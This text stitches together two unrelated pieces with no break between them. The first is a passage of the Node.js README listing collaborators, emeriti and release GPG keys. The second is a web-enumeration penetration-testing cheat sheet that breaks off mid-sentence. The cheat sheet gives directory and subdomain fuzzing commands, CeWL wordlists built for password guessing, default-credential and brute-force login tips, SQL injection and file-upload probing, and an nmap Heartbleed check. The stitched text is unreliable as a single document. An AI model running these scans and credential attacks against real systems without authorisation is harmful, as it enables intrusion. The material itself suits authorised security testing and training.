[TimothyGu](https://github.com/TimothyGu) - **Tiancheng "Timothy" Gu** <<[email protected]>> (he/him) <details> <summary>TSC emeriti members</summary> #### TSC emeriti members * [chrisdickinson](https://github.com/chrisdickinson) - **Chris Dickinson** <<[email protected]>> * [evanlucas](https://github.com/evanlucas) - **Evan Lucas** <<[email protected]>> (he/him) * [Fishrock123](https://github.com/Fishrock123) - **Jeremiah Senkpiel** <<[email protected]>> (he/they) * [gibfahn](https://github.com/gibfahn) - **Gibson Fahnestock** <<[email protected]>> (he/him) * [indutny](https://github.com/indutny) - **Fedor Indutny** <<[email protected]>> * [isaacs](https://github.com/isaacs) - **Isaac Z. Schlueter** <<[email protected]>> * [joshgav](https://github.com/joshgav) - **Josh Gavant** <<[email protected]>> * [mmarchini](https://github.com/mmarchini) - **Mary Marchini** <<[email protected]>> (she/her) * [nebrius](https://github.com/nebrius) - **Bryan Hughes** <<[email protected]>> * [ofrobots](https://github.com/ofrobots) - **Ali Ijaz Sheikh** <<[email protected]>> (he/him) * [orangemocha](https://github.com/orangemocha) - **Alexis Campailla** <<[email protected]>> * [piscisaureus](https://github.com/piscisaureus) - **Bert Belder** <<[email protected]>> * [sam-github](https://github.com/sam-github) - **Sam Roberts** <<[email protected]>> * [shigeki](https://github.com/shigeki) - **Shigeki Ohtsu** <<[email protected]>> (he/him) * [thefourtheye](https://github.com/thefourtheye) - **Sakthipriyan Vairamani** <<[email protected]>> (he/him) * [trevnorris](https://github.com/trevnorris) - **Trevor Norris** <<[email protected]>> </details> <!-- node-core-utils and find-inactive-collaborators.mjs depend on the format of the collaborator list. If the format changes, those utilities need to be tested and updated. --> ### Collaborators * [addaleax](https://github.com/addaleax) - **Anna Henningsen** <<[email protected]>> (she/her) * [aduh95](https://github.com/aduh95) - **Antoine du Hamel** <<[email protected]>> (he/him) * [anonrig](https://github.com/anonrig) - **Yagiz Nizipli** <<[email protected]>> (he/him) * [antsmartian](https://github.com/antsmartian) - **Anto Aravinth** <<[email protected]>> (he/him) * [apapirovski](https://github.com/apapirovski) - **Anatoli Papirovski** <<[email protected]>> (he/him) * [AshCripps](https://github.com/AshCripps) - **Ash Cripps** <<[email protected]>> * [Ayase-252](https://github.com/Ayase-252) - **Qingyu Deng** <<[email protected]>> * [bengl](https://github.com/bengl) - **Bryan English** <<[email protected]>> (he/him) * [benjamingr](https://github.com/benjamingr) - **Benjamin Gruenbaum** <<[email protected]>> * [BethGriggs](https://github.com/BethGriggs) - **Beth Griggs** <<[email protected]>> (she/her) * [bmeck](https://github.com/bmeck) - **Bradley Farias** <<[email protected]>> * [bnb](https://github.com/bnb) - **Tierney Cyren** <<[email protected]>> (they/he) * [bnoordhuis](https://github.com/bnoordhuis) - **Ben Noordhuis** <<[email protected]>> * [BridgeAR](https://github.com/BridgeAR) - **Ruben Bridgewater** <<[email protected]>> (he/him) * [cclauss](https://github.com/cclauss) - **Christian Clauss** <<[email protected]>> (he/him) * [ChALkeR](https://github.com/ChALkeR) - **ะกะบะพะฒะพั€ะพะดะฐ ะะธะบะธั‚ะฐ ะะฝะดั€ะตะตะฒะธั‡** <<[email protected]>> (he/him) * [cjihrig](https://github.com/cjihrig) - **Colin Ihrig** <<[email protected]>> (he/him) * [codebytere](https://github.com/codebytere) - **Shelley Vohr** <<[email protected]>> (she/her) * [cola119](https://github.com/cola119) - **Kohei Ueno** <<[email protected]>> (he/him) * [daeyeon](https://github.com/daeyeon) - **Daeyeon Jeong** <<[email protected]>> (he/him) * [danbev](https://github.com/danbev) - **Daniel Bevenius** <<[email protected]>> (he/him) * [danielleadams](https://github.com/danielleadams) - **Danielle Adams** <<[email protected]>> (she/her) * [debadree25](https://github.com/debadree25) - **Debadree Chatterjee** <<[email protected]>> (he/him) * [deokjinkim](https://github.com/deokjinkim) - **Deokjin Kim** <<[email protected]>> (he/him) * [devnexen](https://github.com/devnexen) - **David Carlier** <<[email protected]>> * [devsnek](https://github.com/devsnek) - **Gus Caplan** <<[email protected]>> (they/them) * [edsadr](https://github.com/edsadr) - **Adrian Estrada** <<[email protected]>> (he/him) * [erickwendel](https://github.com/erickwendel) - **Erick Wendel** <<[email protected]>> (he/him) * [fhinkel](https://github.com/fhinkel) - **Franziska Hinkelmann** <<[email protected]>> (she/her) * [F3n67u](https://github.com/F3n67u) - **Feng Yu** <<[email protected]>> (he/him) * [Flarna](https://github.com/Flarna) - **Gerhard Stรถbich** <<[email protected]>> (he/they) * [gabrielschulhof](https://github.com/gabrielschulhof) - **Gabriel Schulhof** <<[email protected]>> * [gengjiawen](https://github.com/gengjiawen) - **Jiawen Geng** <<[email protected]>> * [GeoffreyBooth](https://github.com/geoffreybooth) - **Geoffrey Booth** <<[email protected]>> (he/him) * [gireeshpunathil](https://github.com/gireeshpunathil) - **Gireesh Punathil** <<[email protected]>> (he/him) * [guybedford](https://github.com/guybedford) - **Guy Bedford** <<[email protected]>> (he/him) * [HarshithaKP](https://github.com/HarshithaKP) - **Harshitha K P** <<[email protected]>> (she/her) * [himself65](https://github.com/himself65) - **Zeyu "Alex" Yang** <<[email protected]>> (he/him) * [iansu](https://github.com/iansu) - **Ian Sutherland** <<[email protected]>> * [JacksonTian](https://github.com/JacksonTian) - **Jackson Tian** <<[email protected]>> * [JakobJingleheimer](https://github.com/JakobJingleheimer) - **Jacob Smith** <<[email protected]>> (he/him) * [jasnell](https://github.com/jasnell) - **James M Snell** <<[email protected]>> (he/him) * [jkrems](https://github.com/jkrems) - **Jan Krems** <<[email protected]>> (he/him) * [joesepi](https://github.com/joesepi) - **Joe Sepi** <<[email protected]>> (he/him) * [joyeecheung](https://github.com/joyeecheung) - **Joyee Cheung** <<[email protected]>> (she/her) * [juanarbol](https://github.com/juanarbol) - **Juan Josรฉ Arboleda** <<[email protected]>> (he/him) * [JungMinu](https://github.com/JungMinu) - **Minwoo Jung** <<[email protected]>> (he/him) * [kuriyosh](https://github.com/kuriyosh) - **Yoshiki Kurihara** <<[email protected]>> (he/him) * [legendecas](https://github.com/legendecas) - **Chengzhong Wu** <<[email protected]>> (he/him) * [Leko](https://github.com/Leko) - **Shingo Inoue** <<[email protected]>> (he/him) * [linkgoron](https://github.com/linkgoron) - **Nitzan Uziely** <<[email protected]>> * [LiviaMedeiros](https://github.com/LiviaMedeiros) - **LiviaMedeiros** <<[email protected]>> * [lpinca](https://github.com/lpinca) - **Luigi Pinca** <<[email protected]>> (he/him) * [lukekarrys](https://github.com/lukekarrys) - **Luke Karrys** <<[email protected]>> (he/him) * [Lxxyx](https://github.com/Lxxyx) - **Zijian Liu** <<[email protected]>> (he/him) * [marco-ippolito](https://github.com/marco-ippolito) - **Marco Ippolito** <<[email protected]>> (he/him) * [marsonya](https://github.com/marsonya) - **Akhil Marsonya** <<[email protected]>> (he/him) * [mcollina](https://github.com/mcollina) - **Matteo Collina** <<[email protected]>> (he/him) * [meixg](https://github.com/meixg) - **Xuguang Mei** <<[email protected]>> (he/him) * [Mesteery](https://github.com/Mesteery) - **Mestery** <<[email protected]>> (he/him) * [mhdawson](https://github.com/mhdawson) - **Michael Dawson** <<[email protected]>> (he/him) * [miladfarca](https://github.com/miladfarca) - **Milad Fa** <<[email protected]>> (he/him) * [mildsunrise](https://github.com/mildsunrise) - **Alba Mendez** <<[email protected]>> (she/her) * [MoLow](https://github.com/MoLow) - **Moshe Atlow** <<[email protected]>> (he/him) * [mscdex](https://github.com/mscdex) - **Brian White** <<[email protected]>> * [MylesBorins](https://github.com/MylesBorins) - **Myles Borins** <<[email protected]>> (he/him) * [oyyd](https://github.com/oyyd) - **Ouyang Yadong** <<[email protected]>> (he/him) * [panva](https://github.com/panva) - **Filip Skokan** <<[email protected]>> (he/him) * [puzpuzpuz](https://github.com/puzpuzpuz) - **Andrey Pechkurov** <<[email protected]>> (he/him) * [Qard](https://github.com/Qard) - **Stephen Belanger** <<[email protected]>> (he/him) * [RafaelGSS](https://github.com/RafaelGSS) - **Rafael Gonzaga** <<[email protected]>> (he/him) * [RaisinTen](https://github.com/RaisinTen) - **Darshan Sen** <<[email protected]>> (he/him) * [richardlau](https://github.com/richardlau) - **Richard Lau** <<[email protected]>> * [rickyes](https://github.com/rickyes) - **Ricky Zhou** <<[email protected]>> (he/him) * [ronag](https://github.com/ronag) - **Robert Nagy** <<[email protected]>> * [ruyadorno](https://github.com/ruyadorno) - **Ruy Adorno** <<[email protected]>> (he/him) * [rvagg](https://github.com/rvagg) - **Rod Vagg** <<[email protected]>> * [ryzokuken](https://github.com/ryzokuken) - **Ujjwal Sharma** <<[email protected]>> (he/him) * [santigimeno](https://github.com/santigimeno) - **Santiago Gimeno** <<[email protected]>> * [shisama](https://github.com/shisama) - **Masashi Hirano** <<[email protected]>> (he/him) * [ShogunPanda](https://github.com/ShogunPanda) - **Paolo Insogna** <<[email protected]>> (he/him) * [srl295](https://github.com/srl295) - **Steven R Loomis** <<[email protected]>> * [sxa](https://github.com/sxa) - **Stewart X Addison** <<[email protected]>> (he/him) * [targos](https://github.com/targos) - **Michaรซl Zasso** <<[email protected]>> (he/him) * [theanarkh](https://github.com/theanarkh) - **theanarkh** <<[email protected]>> (he/him) * [TimothyGu](https://github.com/TimothyGu) - **Tiancheng "Timothy" Gu** <<[email protected]>> (he/him) * [tniessen](https://github.com/tniessen) - **Tobias NieรŸen** <<[email protected]>> (he/him) * [trivikr](https://github.com/trivikr) - **Trivikram Kamat** <<[email protected]>> * [Trott](https://github.com/Trott) - **Rich Trott** <<[email protected]>> (he/him) * [vdeturckheim](https://github.com/vdeturckheim) - **Vladimir de Turckheim** <<[email protected]>> (he/him) * [VoltrexKeyva](https://github.com/VoltrexKeyva) - **Mohammed Keyvanzadeh** <<[email protected]>> (he/him) * [watilde](https://github.com/watilde) - **Daijiro Wachi** <<[email protected]>> (he/him) * [XadillaX](https://github.com/XadillaX) - **Khaidi Chu** <<[email protected]>> (he/him) * [yashLadha](https://github.com/yashLadha) - **Yash Ladha** <<[email protected]>> (he/him) * [ZYSzys](https://github.com/ZYSzys) - **Yongsheng Zhang** <<[email protected]>> (he/him) <details> <summary>Emeriti</summary> <!-- find-inactive-collaborators.mjs depends on the format of the emeriti list. If the format changes, those utilities need to be tested and updated. --> ### Collaborator emeriti * [ak239](https://github.com/ak239) - **Aleksei Koziatinskii** <<[email protected]>> * [andrasq](https://github.com/andrasq) - **Andras** <<[email protected]>> * [AnnaMag](https://github.com/AnnaMag) - **Anna M. Kedzierska** <<[email protected]>> * [AndreasMadsen](https://github.com/AndreasMadsen) - **Andreas Madsen** <<[email protected]>> (he/him) * [aqrln](https://github.com/aqrln) - **Alexey Orlenko** <<[email protected]>> (he/him) * [bcoe](https://github.com/bcoe) - **Ben Coe** <<[email protected]>> (he/him) * [bmeurer](https://github.com/bmeurer) - **Benedikt Meurer** <<[email protected]>> * [boneskull](https://github.com/boneskull) - **Christopher Hiller** <<[email protected]>> (he/him) * [brendanashworth](https://github.com/brendanashworth) - **Brendan Ashworth** <<[email protected]>> * [bzoz](https://github.com/bzoz) - **Bartosz Sosnowski** <<[email protected]>> * [calvinmetcalf](https://github.com/calvinmetcalf) - **Calvin Metcalf** <<[email protected]>> * [chrisdickinson](https://github.com/chrisdickinson) - **Chris Dickinson** <<[email protected]>> * [claudiorodriguez](https://github.com/claudiorodriguez) - **Claudio Rodriguez** <<[email protected]>> * [DavidCai1993](https://github.com/DavidCai1993) - **David Cai** <<[email protected]>> (he/him) * [davisjam](https://github.com/davisjam) - **Jamie Davis** <<[email protected]>> (he/him) * [digitalinfinity](https://github.com/digitalinfinity) - **Hitesh Kanwathirtha** <<[email protected]>> (he/him) * [dmabupt](https://github.com/dmabupt) - **Xu Meng** <<[email protected]>> (he/him) * [dnlup](https://github.com/dnlup) **dnlup** <<[email protected]>> * [eljefedelrodeodeljefe](https://github.com/eljefedelrodeodeljefe) - **Robert Jefe Lindstaedt** <<[email protected]>> * [estliberitas](https://github.com/estliberitas) - **Alexander Makarenko** <<[email protected]>> * [eugeneo](https://github.com/eugeneo) - **Eugene Ostroukhov** <<[email protected]>> * [evanlucas](https://github.com/evanlucas) - **Evan Lucas** <<[email protected]>> (he/him) * [firedfox](https://github.com/firedfox) - **Daniel Wang** <<[email protected]>> * [Fishrock123](https://github.com/Fishrock123) - **Jeremiah Senkpiel** <<[email protected]>> (he/they) * [gdams](https://github.com/gdams) - **George Adams** <<[email protected]>> (he/him) * [geek](https://github.com/geek) - **Wyatt Preul** <<[email protected]>> * [gibfahn](https://github.com/gibfahn) - **Gibson Fahnestock** <<[email protected]>> (he/him) * [glentiki](https://github.com/glentiki) - **Glen Keane** <<[email protected]>> (he/him) * [hashseed](https://github.com/hashseed) - **Yang Guo** <<[email protected]>> (he/him) * [hiroppy](https://github.com/hiroppy) - **Yuta Hiroto** <<[email protected]>> (he/him) * [iarna](https://github.com/iarna) - **Rebecca Turner** <<[email protected]>> * [imran-iq](https://github.com/imran-iq) - **Imran Iqbal** <<[email protected]>> * [imyller](https://github.com/imyller) - **Ilkka Myller** <<[email protected]>> * [indutny](https://github.com/indutny) - **Fedor Indutny** <<[email protected]>> * [isaacs](https://github.com/isaacs) - **Isaac Z. Schlueter** <<[email protected]>> * [italoacasas](https://github.com/italoacasas) - **Italo A. Casas** <<[email protected]>> (he/him) * [jasongin](https://github.com/jasongin) - **Jason Ginchereau** <<[email protected]>> * [jbergstroem](https://github.com/jbergstroem) - **Johan Bergstrรถm** <<[email protected]>> * [jdalton](https://github.com/jdalton) - **John-David Dalton** <<[email protected]>> * [jhamhader](https://github.com/jhamhader) - **Yuval Brik** <<[email protected]>> * [joaocgreis](https://github.com/joaocgreis) - **Joรฃo Reis** <<[email protected]>> * [joshgav](https://github.com/joshgav) - **Josh Gavant** <<[email protected]>> * [julianduque](https://github.com/julianduque) - **Julian Duque** <<[email protected]>> (he/him) * [kfarnung](https://github.com/kfarnung) - **Kyle Farnung** <<[email protected]>> (he/him) * [kunalspathak](https://github.com/kunalspathak) - **Kunal Pathak** <<[email protected]>> * [lance](https://github.com/lance) - **Lance Ball** <<[email protected]>> (he/him) * [lucamaraschi](https://github.com/lucamaraschi) - **Luca Maraschi** <<[email protected]>> (he/him) * [lundibundi](https://github.com/lundibundi) - **Denys Otrishko** <<[email protected]>> (he/him) * [lxe](https://github.com/lxe) - **Aleksey Smolenchuk** <<[email protected]>> * [maclover7](https://github.com/maclover7) - **Jon Moss** <<[email protected]>> (he/him) * [mafintosh](https://github.com/mafintosh) - **Mathias Buus** <<[email protected]>> (he/him) * [matthewloring](https://github.com/matthewloring) - **Matthew Loring** <<[email protected]>> * [micnic](https://github.com/micnic) - **Nicu Micleuศ™anu** <<[email protected]>> (he/him) * [mikeal](https://github.com/mikeal) - **Mikeal Rogers** <<[email protected]>> * [misterdjules](https://github.com/misterdjules) - **Julien Gilli** <<[email protected]>> * [mmarchini](https://github.com/mmarchini) - **Mary Marchini** <<[email protected]>> (she/her) * [monsanto](https://github.com/monsanto) - **Christopher Monsanto** <<[email protected]>> * [MoonBall](https://github.com/MoonBall) - **Chen Gang** <<[email protected]>> * [not-an-aardvark](https://github.com/not-an-aardvark) - **Teddy Katz** <<[email protected]>> (he/him) * [ofrobots](https://github.com/ofrobots) - **Ali Ijaz Sheikh** <<[email protected]>> (he/him) * [Olegas](https://github.com/Olegas) - **Oleg Elifantiev** <<[email protected]>> * [orangemocha](https://github.com/orangemocha) - **Alexis Campailla** <<[email protected]>> * [othiym23](https://github.com/othiym23) - **Forrest L Norvell** <<[email protected]>> (they/them/themself) * [petkaantonov](https://github.com/petkaantonov) - **Petka Antonov** <<[email protected]>> * [phillipj](https://github.com/phillipj) - **Phillip Johnsen** <<[email protected]>> * [piscisaureus](https://github.com/piscisaureus) - **Bert Belder** <<[email protected]>> * [pmq20](https://github.com/pmq20) - **Minqi Pan** <<[email protected]>> * [PoojaDurgad](https://github.com/PoojaDurgad) - **Pooja D P** <<[email protected]>> (she/her) * [princejwesley](https://github.com/princejwesley) - **Prince John Wesley** <<[email protected]>> * [psmarshall](https://github.com/psmarshall) - **Peter Marshall** <<[email protected]>> (he/him) * [refack](https://github.com/refack) - **Refael Ackermann (ืจืคืืœ ืคืœื—ื™)** <<[email protected]>> (he/him/ื”ื•ื/ืืชื”) * [rexagod](https://github.com/rexagod) - **Pranshu Srivastava** <<[email protected]>> (he/him) * [rlidwka](https://github.com/rlidwka) - **Alex Kocharin** <<[email protected]>> * [rmg](https://github.com/rmg) - **Ryan Graham** <<[email protected]>> * [robertkowalski](https://github.com/robertkowalski) - **Robert Kowalski** <<[email protected]>> * [romankl](https://github.com/romankl) - **Roman Klauke** <<[email protected]>> * [ronkorving](https://github.com/ronkorving) - **Ron Korving** <<[email protected]>> * [RReverser](https://github.com/RReverser) - **Ingvar Stepanyan** <<[email protected]>> * [rubys](https://github.com/rubys) - **Sam Ruby** <<[email protected]>> * [saghul](https://github.com/saghul) - **Saรบl Ibarra Corretgรฉ** <<[email protected]>> * [sam-github](https://github.com/sam-github) - **Sam Roberts** <<[email protected]>> * [sebdeckers](https://github.com/sebdeckers) - **Sebastiaan Deckers** <<[email protected]>> * [seishun](https://github.com/seishun) - **Nikolai Vavilov** <<[email protected]>> * [shigeki](https://github.com/shigeki) - **Shigeki Ohtsu** <<[email protected]>> (he/him) * [silverwind](https://github.com/silverwind) - **Roman Reiss** <<[email protected]>> * [starkwang](https://github.com/starkwang) - **Weijia Wang** <<[email protected]>> * [stefanmb](https://github.com/stefanmb) - **Stefan Budeanu** <<[email protected]>> * [tellnes](https://github.com/tellnes) - **Christian Tellnes** <<[email protected]>> * [thefourtheye](https://github.com/thefourtheye) - **Sakthipriyan Vairamani** <<[email protected]>> (he/him) * [thlorenz](https://github.com/thlorenz) - **Thorsten Lorenz** <<[email protected]>> * [trevnorris](https://github.com/trevnorris) - **Trevor Norris** <<[email protected]>> * [tunniclm](https://github.com/tunniclm) - **Mike Tunnicliffe** <<[email protected]>> * [vkurchatkin](https://github.com/vkurchatkin) - **Vladimir Kurchatkin** <<[email protected]>> * [vsemozhetbyt](https://github.com/vsemozhetbyt) - **Vse Mozhet Byt** <<[email protected]>> (he/him) * [watson](https://github.com/watson) - **Thomas Watson** <<[email protected]>> * [whitlockjc](https://github.com/whitlockjc) - **Jeremy Whitlock** <<[email protected]>> * [yhwang](https://github.com/yhwang) - **Yihong Wang** <<[email protected]>> * [yorkie](https://github.com/yorkie) - **Yorkie Liu** <<[email protected]>> * [yosuke-furukawa](https://github.com/yosuke-furukawa) - **Yosuke Furukawa** <<[email protected]>> </details> <!--lint enable prohibited-strings--> Collaborators follow the [Collaborator Guide](./doc/contributing/collaborator-guide.md) in maintaining the Node.js project. ### Triagers * [Ayase-252](https://github.com/Ayase-252) - **Qingyu Deng** <<[email protected]>> * [bmuenzenmeyer](https://github.com/bmuenzenmeyer) - **Brian Muenzenmeyer** <<[email protected]>> (he/him) * [daeyeon](https://github.com/daeyeon) - **Daeyeon Jeong** <<[email protected]>> (he/him) * [F3n67u](https://github.com/F3n67u) - **Feng Yu** <<[email protected]>> (he/him) * [himadriganguly](https://github.com/himadriganguly) - **Himadri Ganguly** <<[email protected]>> (he/him) * [iam-frankqiu](https://github.com/iam-frankqiu) - **Frank Qiu** <<[email protected]>> (he/him) * [kvakil](https://github.com/kvakil) - **Keyhan Vakil** <<[email protected]>> (they/them) * [marsonya](https://github.com/marsonya) - **Akhil Marsonya** <<[email protected]>> (he/him) * [meixg](https://github.com/meixg) - **Xuguang Mei** <<[email protected]>> (he/him) * [Mesteery](https://github.com/Mesteery) - **Mestery** <<[email protected]>> (he/him) * [MoLow](https://github.com/MoLow) - **Moshe Atlow** <<[email protected]>> (he/him) * [PoojaDurgad](https://github.com/PoojaDurgad) - **Pooja Durgad** <<[email protected]>> * [RaisinTen](https://github.com/RaisinTen) - **Darshan Sen** <<[email protected]>> * [VoltrexKeyva](https://github.com/VoltrexKeyva) - **Mohammed Keyvanzadeh** <<[email protected]>> (he/him) Triagers follow the [Triage Guide](./doc/contributing/issues.md#triaging-a-bug-report) when responding to new issues. ### Release keys Primary GPG keys for Node.js Releasers (some Releasers sign with subkeys): * **Beth Griggs** <<[email protected]>> `4ED778F539E3634C779C87C6D7062848A1AB005C` * **Bryan English** <<[email protected]>> `141F07595B7B3FFE74309A937405533BE57C7D57` * **Danielle Adams** <<[email protected]>> `74F12602B6F1C4E913FAA37AD3A89613643B6201` * **Juan Josรฉ Arboleda** <<[email protected]>> `DD792F5973C6DE52C432CBDAC77ABFA00DDBF2B7` * **Michaรซl Zasso** <<[email protected]>> `8FCCA13FEF1D0C2E91008E09770F7A9A5AE15600` * **Myles Borins** <<[email protected]>> `C4F0DFFF4E8C1A8236409D08E73BC641CC11F4C8` * **RafaelGSS** <<[email protected]>> `890C08DB8579162FEE0DF9DB8BEAB4DFCF555EF4` * **Richard Lau** <<[email protected]>> `C82FA3AE1CBEDC6BE46B9360C43CEC45C17AB93C` * **Ruy Adorno** <<[email protected]>> `108F52B48DB57BB0CC439B2997B01419BD92F80A` To import the full set of trusted release keys (including subkeys possibly used to sign releases): ```bash gpg --keyserver hkps://keys.openpgp.org --recv-keys 4ED778F539E3634C779C87C6D7062848A1AB005C gpg --keyserver hkps://keys.openpgp.org --recv-keys 141F07595B7B3FFE74309A937405533BE57C7D57 gpg --keyserver hkps://keys.openpgp.org --recv-keys 74F12602B6F1C4E913FAA37AD3A89613643B6201 gpg --keyserver hkps://keys.openpgp.org --recv-keys DD792F5973C6DE52C432CBDAC77ABFA00DDBF2B7 gpg --keyserver hkps://keys.openpgp.org --recv-keys 8FCCA13FEF1D0C2E91008E09770F7A9A5AE15600 gpg --keyserver hkps://keys.openpgp.org --recv-keys C4F0DFFF4E8C1A8236409D08E73BC641CC11F4C8 gpg --keyserver hkps://keys.openpgp.org --recv-keys 890C08DB8579162FEE0DF9DB8BEAB4DFCF555EF4 gpg --keyserver hkps://keys.openpgp.org --recv-keys C82FA3AE1CBEDC6BE46B9360C43CEC45C17AB93C gpg --keyserver hkps://keys.openpgp.org --recv-keys 108F52B48DB57BB0CC439B2997B01419BD92F80A ``` See [Verifying binaries](#verifying-binaries) for how to use these keys to verify a downloaded file. <details> <summary>Other keys used to sign some previous releases</summary> * **Chris Dickinson** <<[email protected]>> `9554F04D7259F04124DE6B476D5A82AC7E37093B` * **Colin Ihrig** <<[email protected]>> `94AE36675C464D64BAFA68DD7434390BDBE9B9C5` * **Danielle Adams** <<[email protected]>> `1C050899334244A8AF75E53792EF661D867B9DFA` * **Evan Lucas** <<[email protected]>> `B9AE9905FFD7803F25714661B63B535A4C206CA9` * **Gibson Fahnestock** <<[email protected]>> `77984A986EBC2AA786BC0F66B01FBB92821C587A` * **Isaac Z. Schlueter** <<[email protected]>> `93C7E9E91B49E432C2F75674B0A78B0A6C481CF6` * **Italo A. Casas** <<[email protected]>> `56730D5401028683275BD23C23EFEFE93C4CFFFE` * **James M Snell** <<[email protected]>> `71DCFD284A79C3B38668286BC97EC7A07EDE3FC1` * **Jeremiah Senkpiel** <<[email protected]>> `FD3A5288F042B6850C66B31F09FE44734EB7990E` * **Juan Josรฉ Arboleda** <<[email protected]>> `61FC681DFB92A079F1685E77973F295594EC4689` * **Julien Gilli** <<[email protected]>> `114F43EE0176B71C7BC219DD50A3051F888C628D` * **Rod Vagg** <<[email protected]>> `DD8F2338BAE7501E3DD5AC78C273792F7D83545D` * **Ruben Bridgewater** <<[email protected]>> `A48C2BEE680E841632CD4E44F07496B3EB3C1762` * **Shelley Vohr** <<[email protected]>> `B9E2F5981AA6E0CD28160D9FF13993A75599653C` * **Timothy J Fontaine** <<[email protected]>> `7937DFD2AB06298B2293C3187D33FF9D0246406D` </details> ### Security release stewards When possible, the commitment to take slots in the security release steward rotation is made by companies in order to ensure individuals who act as security stewards have the support and recognition from their employer to be able to prioritize security releases. Security release stewards manage security releases on a rotation basis as outlined in the [security release process](./doc/contributing/security-release-process.md). * Datadog * [bengl](https://github.com/bengl) - **Bryan English** <<[email protected]>> (he/him) * [vdeturckheim](https://github.com/vdeturckheim) - **Vladimir de Turckheim** <<[email protected]>> (he/him) * NearForm * [RafaelGSS](https://github.com/RafaelGSS) - **Rafael Gonzaga** <<[email protected]>> (he/him) * NodeSource * [juanarbol](https://github.com/juanarbol) - **Juan Josรฉ Arboleda** <<[email protected]>> (he/him) * Platformatic * [mcollina](https://github.com/mcollina) - **Matteo Collina** <<[email protected]>> (he/him) * Red Hat and IBM * [joesepi](https://github.com/joesepi) - **Joe Sepi** <<[email protected]>> (he/him) * [mhdawson](https://github.com/mhdawson) - **Michael Dawson** <<[email protected]>> (he/him) ## License Node.js is available under the [MIT license](https://opensource.org/licenses/MIT). Node.js also includes external libraries that are available under a variety of licenses. See [LICENSE](https://github.com/nodejs/node/blob/HEAD/LICENSE) for the full license text. [Code of Conduct]: https://github.com/nodejs/admin/blob/HEAD/CODE_OF_CONDUCT.md [Contributing to the project]: CONTRIBUTING.md [Node.js website]: https://nodejs.org/ [OpenJS Foundation]: https://openjsf.org/ [Strategic initiatives]: doc/contributing/strategic-initiatives.md [Technical values and prioritization]: doc/contributing/technical-values.md [Working Groups]: https://github.com/nodejs/TSC/blob/HEAD/WORKING_GROUPS.md
# Web Enum Quick Reference ## Contents - [Web Enum Quick Reference](#web-enum-quick-reference) * [Contents](#contents) * [HTTP and HTTPS Checklist](#http-and-https-checklist) * [Scan for sub directories and pages](#scan-for-sub-directories-and-pages) + [Wordlists](#wordlists) + [Scanning Tools](#scanning-tools) + [Curl](#curl) - [Web app specific](#web-app-specific) - [Login pages](#login-pages) - [Shellshock and Heartbleed](#shellshock-and-heartbleed) * [Heartbleed](#heartbleed) * [Shellshock](#shellshock) - [SSRF](#ssrf) - [Resources](#resources) * [Cheat Sheets](#cheat-sheets) * [Further Reading](#further-reading) * [Sources](#sources) ## HTTP and HTTPS Checklist - [ ] Scan page with Wappanalyzer FireFox add-on - [ ] Scan for sub directories and pages - admin pages?, login pages?, file upload?, user input fields? - [ ] Check for robots.txt, security.txt, sitemap.xml files - [ ] Test strength of encryption using nmap ssl-enum-ciphers script - [ ] Look for service name and version - searchsploit / google for exploits - [ ] Service specific scanners: wpscan, Joomscan - [ ] Admin page - access misconfigs, login? - [ ] Log in pages - guess default creds, admin:admin, admin:password - [ ] File upload pages - what types of files are accepted?, what checks are being implemented? is there a value you can change to include a file? - [ ] User input fields: SQL injection, cross site scripting - [ ] Intercept HTTP requests with Burp and examine Reference: [Payload All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings) Firefox addons: script to add ons [here](https://github.com/mazen160/Firefox-Security-Toolkit) [Wappanalyzer](https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/), [Foxy Proxy](https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/) and [user agent switcher](https://addons.mozilla.org/en-US/firefox/addon/uaswitcher/) [Pen Testing Web Checklist](https://pentestbook.six2dez.com/others/web-checklist) HTTP Status Codes 1xx - Informational 2xx - Success 3xx - Redirection 4xx - Client Error 5xx - Server Error ## Scan for sub directories and pages ### Wordlists Common wordlists to use for web directory scanning: /usr/share/wordlists/dirb/common.txt /usr/share/wordlists/dirbuster/*.txt /usr/share/wordlists/wfuzz/general/*.txt /usr/share/seclists/Discovery/Web-Content/ Common wordlists to use for user enumeration scanning: /usr/share/seclists/Usernames /usr/share/wordlists/dirbuster/apache-user-enum-2.0 Create a wordlist with CeWL: cewl http://www.site.org -w wordlist.txt CeWL sometimes misses directories so use these steps to create a dir list for CeWL to crawl: feroxbuster -eknr --wordlist /usr/share/seclists/Discovery/Web-Content/big.txt -u http://10.10.10.10 -o ferox.txt cat ferox.txt | grep 200 | grep -v "png\|\.js" | cut -d "h" -f2-100 | sed "s/^/h/g" >> urls.txt for url in $(cat urls.txt); do echo $url && cewl -d 5 $url >> temp_cewl.txt;done cat temp_cewl.txt | sort -u >> cewl.txt && rm temp_cewl.txt tr '[:upper:]' '[:lower:]' < cewl.txt > cewl_lower.txt cat cewl_lower.txt >> cewl.txt #then use the CeWL wordlist for password guessing ### Scanning Tools Nikto Gobuster / Dirb / Feroxbuster Ffuf /wfuzz: fuzzing tools [BFAC](https://github.com/mazen160/bfac): search for backup files Web Scanning: nikto -h http://127.0.0.1:80/ Page and Directory Fuzzing: dirb http://127.0.0.1/ (default word list: common.txt) gobuster dir -u http://127.0.0.1/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -e -k -s "200,204,301,302,307,403,500" -x "txt,html,php,asp,aspx,jsp" -z ffuf -w wordlist.txt -u https://example.org/FUZZ -mc all -c -v ffuf -w wordlist.txt -u http://www.site.org/FUZZ -e .aspx,.html,.php,.txt feroxbuster -u http://target.com -w /usr/share/dirb/wordlists/common.txt -d [recursion depth] -t [threads] -s [status codes] whatweb http://target wfuzz -c --hc=404 -R 2 -w /usr/share/dirb/wordlists/common.txt http://target/fuzz Virtual Hosts (subdomains): gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://site.com --append-domain ### Curl curl -v -X OPTIONS http://<targetip>/test/ curl --upload-file <file name> -v --url <url> -0 --http1.0 Other Tools: Burp Suite OWASP Zap Cadaver # Web app specific See [CMS.md](https://github.com/lw8192/Red-Team-Rising/blob/main/Web/CMS.md) # Login pages Default creds - admin: admin, admin:password, service specific default creds Register a new user Brute force log in [use hydra or Burp Suite](https://github.com/lw8192/Red-Team-Rising/blob/main/Exploitation/Cracking.md) SQL injection # Shellshock and Heartbleed ## Heartbleed Bug in OpenSSL crypto software library. Allows an attacker to steal info normally protected by SSL/TLS encryption. Testing: scan using nmap heartbleed script nmap -p 443 -sV --script ssl-heartbleed www.site.org Example: Exploit the Heartbleed vulnerability to steal the following from a 